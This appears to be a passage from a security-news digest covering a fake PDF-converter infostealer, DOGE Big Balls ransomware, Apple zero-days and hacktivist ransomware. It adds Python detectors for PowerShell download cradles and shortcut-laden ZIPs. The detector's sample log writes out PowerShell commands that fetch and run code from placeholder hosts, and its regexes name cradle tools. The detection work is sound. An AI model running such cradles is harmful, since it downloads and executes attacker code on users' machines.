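As an added example (not CloudSEK's detection content), the block below scores process-creation events for the pattern this campaign relies on: PowerShell launched from a user's shell or browser with a hidden window, a policy bypass, an encoded command, or a download cradle. The log lines are constructed in a simple "parent|image|command line" form, the hostnames are placeholders, and the encoded payload is built inside the example so that the base64/UTF-16LE decoding path is exercised; none of it is the campaign's actual command.

```python
# Added example, not CloudSEK's detection content: scores process-creation events for a
# user-launched PowerShell download cradle, using constructed "parent|image|cmdline"
# log lines. Hostnames are placeholders, not indicators from the report.
import base64
import re

# Indicator name -> regex applied to the (decoded) command line, case-insensitively.
INDICATORS = {
    "hidden-window":   r"-w(?:indowstyle)?\s+hidden",
    "policy-bypass":   r"-e(?:xecutionpolicy|p)\s+bypass",
    "encoded-command": r"-e(?:nc|ncodedcommand|c)\s+[A-Za-z0-9+/=]{20,}",
    "download-cradle": r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|"
                       r"net\.webclient|iex|invoke-expression|mshta|curl\s[^|]*\|\s*iex)\b",
}
USER_SHELL_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}


def decode_encoded_command(cmdline: str) -> str:
    """PowerShell -enc takes base64 of UTF-16LE; append the decoded text for matching."""
    m = re.search(r"-e(?:nc|ncodedcommand|c)\s+([A-Za-z0-9+/=]{20,})", cmdline, re.I)
    if not m:
        return cmdline
    try:
        decoded = base64.b64decode(m.group(1)).decode("utf-16le", errors="ignore")
    except ValueError:
        return cmdline
    return cmdline + " " + decoded


def score_event(parent: str, image: str, cmdline: str) -> dict:
    """Return matched indicators and a score; PowerShell only, user-shell parent adds weight."""
    if not image.lower().endswith(("powershell.exe", "pwsh.exe")):
        return {"score": 0, "indicators": []}
    text = decode_encoded_command(cmdline)
    hits = [name for name, pat in INDICATORS.items() if re.search(pat, text, re.I)]
    if parent.lower() in USER_SHELL_PARENTS:
        hits.append("user-shell-parent")
    return {"score": len(hits), "indicators": hits}


def suspicious_events(log_lines, threshold: int = 2) -> list:
    """(parent, indicators) for every line whose score reaches the threshold."""
    out = []
    for line in log_lines:
        parent, image, cmdline = line.split("|", 2)
        result = score_event(parent, image, cmdline)
        if result["score"] >= threshold:
            out.append((parent, result["indicators"]))
    return out


# Constructed sample log. The third line carries an -enc payload built here so the
# decoder path runs; it is not the campaign's actual command.
_ENC = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/a')"
    .encode("utf-16le")).decode()
SAMPLE_LOG = [
    'explorer.exe|powershell.exe|powershell -w hidden -ep bypass -c "iex (irm http://pdf.example.invalid/c)"',
    "svchost.exe|powershell.exe|powershell.exe -File C:\\ProgramData\\inventory.ps1",
    f"chrome.exe|powershell.exe|powershell -NoP -W Hidden -Enc {_ENC}",
]

if __name__ == "__main__":
    for parent, hits in suspicious_events(SAMPLE_LOG):
        print(parent, hits)
```

The second sample line is the control: a scheduled administrative script launched by a service host matches nothing, which is what keeps a rule like this from drowning analysts in legitimate PowerShell. The parent-process weight matters because the lure only works if the victim types the command themselves.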

Recommended read:
References :
  • hackread.com: CloudSEK uncovers a sophisticated malware campaign where attackers impersonate PDFCandy.com to distribute the ArechClient2 information stealer
  • securityonline.info: Beware Fake PDF Converters: A Social Engineering Threat
  • www.scworld.com: Infostealer deployed via bogus PDFCandy converter
  • Cyber Security News: CyberPress: Beware! Online PDF Converters Luring Users into Installing Password-Stealing Malware

@nvd.nist.gov //
Cyble Research and Intelligence Labs (CRIL) has uncovered a new ransomware operation dubbed "DOGE BIG BALLS Ransomware." This campaign uses a finance-themed ZIP file named "Pay Adjustment.zip" to trick users into executing malicious shortcut files. These files then trigger multi-stage PowerShell scripts, ultimately delivering custom payloads that include a kernel-mode exploit tool and reconnaissance modules. The ransomware itself is a modified version of Fog, further customized with a provocative name that references a known public figure.

The attention-grabbing name is most likely a deliberate attempt to misdirect attribution and sow confusion, including doubt about the effectiveness of government cybersecurity efforts. The delivery mechanism itself is conventional: the ransomware arrives in a ZIP archive whose shortcut file is dressed up as a PDF document, and opening that shortcut launches the multi-stage PowerShell chain, which relies on obfuscation and anti-detection techniques to get past traditional defenses.

The DOGE Big Balls campaign shows how ransomware operators blend technical sophistication with psychological manipulation. It arrives alongside a continuing run of ransomware attacks on the healthcare sector, most recently the attack on DaVita, a Denver-based dialysis firm, and underscores the need for organizations to bolster their defenses and incident response capabilities to protect sensitive data and maintain operational continuity.
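The following added example (not Cyble's tooling) inspects a ZIP attachment before anyone opens it and flags Windows shortcut entries, including shortcuts hiding behind a document extension or no extension at all, by the Shell Link file header rather than by name alone. The archive is built in memory here; the inner name "Pay Adjustment.pdf.lnk" is an assumption for the illustration, since the page gives only the outer "Pay Adjustment.zip".

```python
# Added example, not Cyble's tooling: flags Windows shortcut (.lnk) entries in a ZIP by
# the Shell Link header, not just by name. The archive is built in memory; the inner
# file name is an assumption (the page only gives the outer "Pay Adjustment.zip").
import io
import zipfile

# Shell Link header: HeaderSize 0x4C (little-endian) followed by the LinkCLSID
# {00021401-0000-0000-C000-000000000046} in its on-disk byte order.
LNK_MAGIC = bytes.fromhex("4c000000" "01140200" "00000000" "c000000000000046")
DOC_EXTENSIONS = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt")


def build_sample_zip(include_lure: bool = True) -> bytes:
    """Constructed lure: a shortcut posing as a PDF beside a genuine (minimal) PDF."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("Pay Adjustment.pdf", b"%PDF-1.4\n%%EOF\n")
        if include_lure:
            z.writestr("Pay Adjustment.pdf.lnk", LNK_MAGIC + b"\x00" * 60)
            z.writestr("readme", LNK_MAGIC + b"\x00" * 60)   # no extension, still a shortcut
    return buf.getvalue()


def inspect_zip(data: bytes) -> list:
    """(entry name, reasons) for every entry that looks like a shortcut lure."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for info in z.infolist():
            if info.is_dir():
                continue
            name = info.filename
            lower = name.lower()
            reasons = []
            if lower.endswith(".lnk"):
                reasons.append("lnk-extension")
                if lower[:-4].endswith(DOC_EXTENSIONS):
                    reasons.append("double-extension")
            with z.open(info) as f:
                head = f.read(len(LNK_MAGIC))
            if head == LNK_MAGIC:          # content check: catches renamed shortcuts
                reasons.append("lnk-magic")
            if reasons:
                findings.append((name, reasons))
    return findings


def should_block(findings: list) -> bool:
    """Any shortcut in a mailed archive is grounds to block the whole attachment."""
    return any("lnk-magic" in r or "lnk-extension" in r for _, r in findings)


if __name__ == "__main__":
    for name, reasons in inspect_zip(build_sample_zip()):
        print(name, reasons)
```

The header check is the part worth keeping: a gateway that only looks at extensions misses a shortcut saved without one, and Explorer will still execute it when double-clicked if the file is later renamed.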

Recommended read:
References :
  • cyble.com: This attack leverages a ZIP file with a deceptive LNK shortcut to silently execute a multi-stage PowerShell-based infection chain, ensuring stealthy deployment. A vulnerable driver ( ) is exploited through a Bring Your Own Vulnerable Driver (BYOVD) technique to gain kernel-level read/write access for privilege escalation. The payload is a customized version of Fog ransomware, branded as "DOGE BIG BALLS Ransomware," reflecting an attempt to add psychological manipulation and misattribution. Ransomware scripts include provocative political commentary and the use of a real individual's name and address, indicating intent to confuse, intimidate, or mislead victims. The malware uses router MAC addresses (BSSIDs) and queries the Wigle.net API to determine the victim’s physical location—offering more accurate geolocation than IP-based methods. Extensive system and network information, including hardware IDs, firewall states, network configuration, and running processes, is collected via PowerShell, aiding attacker profiling. Embedded within the toolkit is a Havoc C2 beacon, hinting at the threat actor’s (TA's) potential to maintain long-term access or conduct additional post-encryption activities.
  • Davey Winder: DOGE Big Balls Ransomware Attack — What You Need To Know
  • thecyberexpress.com: TheCyberExpress: DOGE BIG BALLS Campaign Blurs Lines Between Exploitation, Recon, and Reputation Damage
  • www.cybersecurity-insiders.com: DOGE Big Balls Ransomware turns into a big cyber threat
  • www.cysecurity.news: CySecurity: DOGE Big Balls Ransomware turns into a big cyber threat

@techcrunch.com //
Apple has released emergency security updates to address two zero-day vulnerabilities that have been actively exploited in targeted attacks against specific iPhone users. The company confirmed that these vulnerabilities were leveraged in an "extremely sophisticated attack" and urged users to update their devices immediately. The bugs, identified as CVE-2025-31200 and CVE-2025-31201, impact iOS, macOS, tvOS, iPadOS, and visionOS.

The first vulnerability, CVE-2025-31200, is located in CoreAudio, Apple's system-level component for audio processing. According to Apple, this flaw can be triggered by processing a maliciously crafted audio stream within a media file, potentially allowing attackers to execute arbitrary code on the affected device. The second flaw, CVE-2025-31201, allows attackers to bypass Pointer Authentication Codes (PAC), a security feature designed to prevent memory corruption attacks. Apple credited the discovery of one of the bugs to security researchers working at Google’s Threat Analysis Group, which investigates government-backed cyberattacks. This may indicate that the attacks targeting Apple customers were launched or coordinated by a nation state or government agency.

To mitigate the risk, Apple has released iOS 18.4.1/iPadOS 18.4.1 for iPhones and iPads, macOS Sequoia 15.4.1, tvOS 18.4.1, and visionOS 2.4.1 for the Apple Vision Pro. Users are strongly advised to update their devices to the latest versions. Apple has not released details on who was behind the attacks, how widespread they were, or whether any users were successfully compromised.

Recommended read:
References :
  • techcrunch.com: Apple says it's fixed two zero-day security bugs that may've been used in an extremely sophisticated attack against specific targeted individuals on iOS.
  • PCMag UK security: Apple Patches iPhone Bug Involving Malicious Media Files
  • www.bleepingcomputer.com: BleepingComputer: Apple fixes two zero-days exploited in targeted iPhone attacks
  • securityonline.info: Security Online: Urgent Apple Security Patch: Zero-Day Exploits Target iPhones
  • securityonline.info: Urgent Apple Security Patch: Zero-Day Exploits Target iPhones

@cyble.com //
References: cyble.com, threatmon.io
Hacktivist groups are increasingly adopting sophisticated and destructive attack methods, moving beyond basic DDoS attacks to target critical infrastructure with ransomware. These groups, motivated by ideological goals, are focusing on government platforms and industrial manufacturers. Pro-Russian hacktivists are primarily targeting NATO-aligned nations and supporters of Ukraine, while pro-Ukrainian, pro-Palestinian, and anti-establishment groups are focusing on Russia, Israel, and the United States. This evolution reflects a shift towards hybrid warfare tactics, combining DDoS, credential leaks, and ICS disruption to overcome single-layer defenses.

The energy sector is particularly vulnerable, with successful cyber breaches posing severe risks to national security, economic stability, and public safety. The CyberAv3ngers, an Iranian state-sponsored hacker group, exemplifies this threat. Despite masquerading as hacktivists, they are actively targeting industrial control systems in water, oil and gas, and other critical infrastructure sectors worldwide. The group has already caused global disruption and shows no signs of slowing down. Their actions represent a rare example of state-sponsored cyber saboteurs crossing the line and disrupting critical infrastructure.

Reports and investigations highlight vulnerabilities within power grids and other key systems. Recent investigations have revealed hidden capabilities in Chinese-manufactured power transformers that could allow remote shutdown from overseas. This discovery prompted concerns about potential "sleeper cells" within critical national systems. Furthermore, ransomware attacks continue to be a major threat, causing operational disruptions, data breaches, and financial losses. The industry is responding with increased cybersecurity investment and proactive strategies as professionals see cybersecurity as the greatest risk to their business.

Recommended read:
References :
  • cyble.com: Cyble report on hacktivists moving into ransomware attacks.
  • threatmon.io: Ransomware attacks remain one of the most critical threats to modern businesses, leading to severe operational disruptions, data breaches, and substantial financial losses.